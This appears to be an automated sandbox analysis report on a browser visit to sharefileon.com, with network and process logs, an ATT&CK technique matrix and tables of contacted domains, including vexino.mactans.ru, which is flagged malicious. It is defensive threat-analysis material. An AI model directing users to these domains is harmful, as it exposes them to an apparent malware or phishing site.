Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: classification engineClassification label: mal48.win@22/569@36/14
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1984,i,5179110218857674790,7664431697480390982,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://sharefileon.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1984,i,5179110218857674790,7664431697480390982,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://sharefileon.com0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://sharefileon.com/4040%Avira URL Cloudsafe
http://sharefileon.com/0%Avira URL Cloudsafe
http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf).0%Avira URL Cloudsafe
https://sharefileon.com/manifest.webmanifest0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sharefileon.com
76.223.105.230
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      vexino.mactans.ru
      172.67.208.33
      truetrue
        unknown
        code.jquery.com
        151.101.130.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.24.14
          truefalse
            high
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              high
              www.google.com
              142.250.181.100
              truefalse
                high
                s-0005.dual-s-msedge.net
                52.123.128.14
                truefalse
                  high
                  isteam.wsimg.com
                  13.126.107.86
                  truefalse
                    high
                    weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru
                    104.21.65.72
                    truefalse
                      high
                      img1.wsimg.com
                      unknown
                      unknownfalse
                        high
                        teams.nel.measure.office.net
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                            high
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f38965da8164322/1734456067754/uaxTCBfY0EP6nEYfalse
                              high
                              https://sharefileon.com/true
                                unknown
                                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f38965da8164322/1734456067754/419efe1e59f95ef2d623cf66173f5d1618a76a3e3584ba92125c2cd6aca37a03/Rmq4r5O10Pi1hY1false
                                    high
                                    https://sharefileon.com/manifest.webmanifesttrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://sharefileon.com/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://local.teams.office.com/sourcemaps/hashed-assets/453394-e3907e3486cba0fd.js.mapchromecache_625.1.dr, chromecache_616.1.drfalse
                                      high
                                      https://local.teams.office.com/sourcemaps/hashed-assets/381452-be282a834691e600.js.mapchromecache_582.1.dr, chromecache_570.1.drfalse
                                        high
                                        https://local.teams.office.com/sourcemaps/hashed-assets/94139-a0e97f9184666b52.js.mapchromecache_408.1.dr, chromecache_440.1.drfalse
                                          high
                                          https://local.teams.office.com/sourcemaps/hashed-assets/main-77fbafbde8768a32.js.mapchromecache_705.1.dr, chromecache_475.1.drfalse
                                            high
                                            https://local.teams.office.com/sourcemaps/hashed-assets/725973-6805c0080a1be3a7.js.mapchromecache_575.1.dr, chromecache_611.1.drfalse
                                              high
                                              https://local.teams.office.com/sourcemaps/hashed-assets/gallery-locale-en-us-83a3d27de297752a.js.mapchromecache_683.1.dr, chromecache_456.1.drfalse
                                                high
                                                https://aka.ms/teamsliveauditoriumchromecache_431.1.dr, chromecache_687.1.drfalse
                                                  high
                                                  https://local.teams.office.com/sourcemaps/hashed-assets/459872-6142424fcf6e95ed.js.mapchromecache_394.1.dr, chromecache_381.1.drfalse
                                                    high
                                                    https://local.teams.office.com/sourcemaps/hashed-assets/704334-4685fd55d90d2109.js.mapchromecache_516.1.dr, chromecache_345.1.drfalse
                                                      high
                                                      https://local.teams.office.com/sourcemaps/hashed-assets/400532-77cf1bd2c9b72a9f.js.mapchromecache_515.1.dr, chromecache_673.1.drfalse
                                                        high
                                                        https://local.teams.office.com/sourcemaps/hashed-assets/412417-b3da2627a5108e3b.js.mapchromecache_483.1.dr, chromecache_682.1.drfalse
                                                          high
                                                          https://local.teams.office.com/sourcemaps/hashed-assets/96611-20373bce5580a2d1.js.mapchromecache_353.1.dr, chromecache_509.1.drfalse
                                                            high
                                                            https://local.teams.office.com/sourcemaps/hashed-assets/118046-b79764f5406c6892.js.mapchromecache_519.1.drfalse
                                                              high
                                                              https://local.teams.office.com/sourcemaps/hashed-assets/534940-f1c535e0c8723100.js.mapchromecache_429.1.dr, chromecache_500.1.drfalse
                                                                high
                                                                https://local.teams.office.com/sourcemaps/hashed-assets/calling-locale-en-us-314542ee1dfe6bf0.js.mapchromecache_478.1.dr, chromecache_565.1.drfalse
                                                                  high
                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/950449-d8aed37fd787097c.js.mapchromecache_342.1.dr, chromecache_404.1.drfalse
                                                                    high
                                                                    https://sharefileon.com/404chromecache_669.1.drtrue
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/502994-560a49b271bc8e93.js.mapchromecache_671.1.dr, chromecache_679.1.drfalse
                                                                      high
                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/52085-aa1e2134d5b41b9f.js.mapchromecache_538.1.dr, chromecache_537.1.drfalse
                                                                        high
                                                                        https://installer.teams.static.microsoft/production-windows-x86/24295.605.3225.8804/MicrosoftTeams-xchromecache_525.1.drfalse
                                                                          high
                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/675783-0d429e991ff3f034.js.mapchromecache_375.1.dr, chromecache_405.1.drfalse
                                                                            high
                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/425104-7f05ec4bfb91b2a4.js.mapchromecache_416.1.dr, chromecache_521.1.drfalse
                                                                              high
                                                                              http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf).chromecache_369.1.dr, chromecache_494.1.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/data-schema-0ac7440254a0a997.js.mapchromecache_453.1.dr, chromecache_487.1.drfalse
                                                                                high
                                                                                https://aka.ms/teamshost/?liveevent=true&tenantId=chromecache_431.1.dr, chromecache_687.1.drfalse
                                                                                  high
                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/367927-44fa44710376bb7a.js.mapchromecache_675.1.drfalse
                                                                                    high
                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/657660-4776a55841f4d594.js.mapchromecache_424.1.dr, chromecache_346.1.drfalse
                                                                                      high
                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/337355-53949d9632bb831d.js.mapchromecache_348.1.dr, chromecache_557.1.drfalse
                                                                                        high
                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/985157-23a375d8f9446453.js.mapchromecache_441.1.dr, chromecache_642.1.drfalse
                                                                                          high
                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/834680-ec074dfe4008b640.js.mapchromecache_482.1.dr, chromecache_397.1.drfalse
                                                                                            high
                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/900516-ca863ef1d4e5aa90.js.mapchromecache_497.1.dr, chromecache_547.1.drfalse
                                                                                              high
                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/169767-cde234dc0bbb0b5b.js.mapchromecache_540.1.drfalse
                                                                                                high
                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/602438-e94806bc95e51c6b.js.mapchromecache_422.1.dr, chromecache_503.1.drfalse
                                                                                                  high
                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/718583-24621dda8c5747d2.js.mapchromecache_481.1.dr, chromecache_697.1.drfalse
                                                                                                    high
                                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/services-calling-service-adapters-cd2e0d2e14chromecache_628.1.dr, chromecache_638.1.drfalse
                                                                                                      high
                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/57627-ce7087dcecb2b6d1.js.mapchromecache_539.1.dr, chromecache_421.1.drfalse
                                                                                                        high
                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/478644-057a172734e2511c.js.mapchromecache_467.1.dr, chromecache_663.1.drfalse
                                                                                                          high
                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/674958-37b4889b0bcb5464.js.mapchromecache_693.1.dr, chromecache_378.1.drfalse
                                                                                                            high
                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/192699-192c894d6acbddef.js.mapchromecache_491.1.dr, chromecache_372.1.drfalse
                                                                                                              high
                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/638637-20856706a13e593e.js.mapchromecache_598.1.dr, chromecache_450.1.drfalse
                                                                                                                high
                                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/927767-5e852cded1999922.js.mapchromecache_586.1.dr, chromecache_580.1.drfalse
                                                                                                                  high
                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/711005-dcc14d48e317723d.js.mapchromecache_597.1.dr, chromecache_711.1.drfalse
                                                                                                                    high
                                                                                                                    https://img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/blob-4f9b682.pngchromecache_549.1.drfalse
                                                                                                                      high
                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/725591-f9265ef9f2d4e54e.js.mapchromecache_436.1.dr, chromecache_417.1.drfalse
                                                                                                                        high
                                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/2333-afd67534d2d2fc7e.js.mapchromecache_437.1.drfalse
                                                                                                                          high
                                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/209929-95fdc8ec21fd6b75.js.mapchromecache_415.1.dr, chromecache_709.1.drfalse
                                                                                                                            high
                                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/teams-and-channels-locale-en-us-f503fa26e616chromecache_613.1.dr, chromecache_452.1.drfalse
                                                                                                                              high
                                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/981746-a3168603d4db6f8f.js.mapchromecache_668.1.dr, chromecache_461.1.drfalse
                                                                                                                                high
                                                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/416397-1c547cab2265aa75.js.mapchromecache_594.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/990521-e9325ffc81da8165.js.mapchromecache_639.1.dr, chromecache_664.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/917004-31390847bfb97c52.js.mapchromecache_470.1.dr, chromecache_524.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/712315-4d70afe314e618ce.js.mapchromecache_423.1.dr, chromecache_351.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/config-prod-7274dc51e5177220.js.mapchromecache_431.1.dr, chromecache_687.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/421318-8ae476c777a9a79b.js.mapchromecache_407.1.dr, chromecache_473.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/669152-07edb61a22aacff3.js.mapchromecache_448.1.dr, chromecache_593.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://aka.ms/producerlearnmorechromecache_431.1.dr, chromecache_687.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/876152-9b16060b7960d27c.js.mapchromecache_608.1.dr, chromecache_633.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/34655-d47d0d947ba2b72d.js.mapchromecache_389.1.dr, chromecache_649.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/492696-90f4127f742d63a7.js.mapchromecache_419.1.dr, chromecache_426.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/972276-16a6accc1de1eb6a.js.mapchromecache_357.1.dr, chromecache_401.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/365138-e937838d72d8903a.js.mapchromecache_384.1.dr, chromecache_577.1.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/387552-d458b7b8f456ca9b.js.mapchromecache_385.1.dr, chromecache_445.1.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/premium-benefits-locale-en-us-48b16b68f7171echromecache_465.1.dr, chromecache_376.1.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/recurrence-locale-en-us-651b2b023666e1f6.js.chromecache_626.1.dr, chromecache_640.1.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/690936-9e6744bf3934da2e.js.mapchromecache_655.1.dr, chromecache_661.1.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/653800-bb36137dc0ad9a94.js.mapchromecache_564.1.dr, chromecache_530.1.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/945208-20d36298097b5d53.js.mapchromecache_532.1.dr, chromecache_667.1.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/299770-19f9009717d80418.js.mapchromecache_466.1.dr, chromecache_700.1.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/509664-7bd4baf7c60bad9d.js.mapchromecache_698.1.dr, chromecache_359.1.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/931067-540363234a7874ae.js.mapchromecache_603.1.dr, chromecache_710.1.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/965787-5b58e72ef92ce381.js.mapchromecache_617.1.dr, chromecache_695.1.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/816373-105b523bdd46a179.js.mapchromecache_438.1.dr, chromecache_361.1.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/710639-d32f6e097a5709e2.js.mapchromecache_388.1.dr, chromecache_587.1.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://img1.wsimg.com/gfonts/s/quicksand/v31/6xKtdSZaM9iE8KbpRA_hJVQNcOM.woff2)chromecache_669.1.dr, chromecache_549.1.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/829271-5bfd7ab6aba19f68.js.mapchromecache_523.1.dr, chromecache_420.1.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/443192-5c28040beb13153d.js.mapchromecache_356.1.dr, chromecache_689.1.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/61875-11d8be0fadbe338b.js.mapchromecache_506.1.dr, chromecache_363.1.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/221963-5e2af34f8bc6a49a.js.mapchromecache_712.1.dr, chromecache_392.1.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/662908-71da5000e4ef5f3f.js.mapchromecache_694.1.dr, chromecache_468.1.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/268910-19dd9f09325e420a.js.mapchromecache_522.1.dr, chromecache_502.1.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://installer.teams.static.microsoft/production-windows-x64/24295.605.3225.8804/MSTeams-x64.msixchromecache_525.1.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/471294-5c6c36c6a7d801e5.js.mapchromecache_546.1.dr, chromecache_479.1.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://installer.teams.static.microsoft/production-osx/24295.615.3297.8324/MicrosoftTeams.pkgchromecache_525.1.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/941359-9026e0bb33bc2d9d.js.mapchromecache_486.1.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/417548-aa8c7d7584ee7aca.js.mapchromecache_595.1.dr, chromecache_526.1.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://aka.ms/mcpgapschromecache_471.1.dr, chromecache_672.1.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/914945-cba296ef334bdcfb.js.mapchromecache_534.1.dr, chromecache_485.1.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/839569-5ad0493aad697642.js.mapchromecache_650.1.dr, chromecache_451.1.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/calendar-locale-en-us-f89bbb2143811669.js.machromecache_390.1.dr, chromecache_696.1.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/services-people-4b57d8ffa3d30125.js.mapchromecache_701.1.dr, chromecache_578.1.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/320494-30cfac786d71789c.js.mapchromecache_391.1.dr, chromecache_545.1.drfalse
                                                                                                                                                                                                                      high
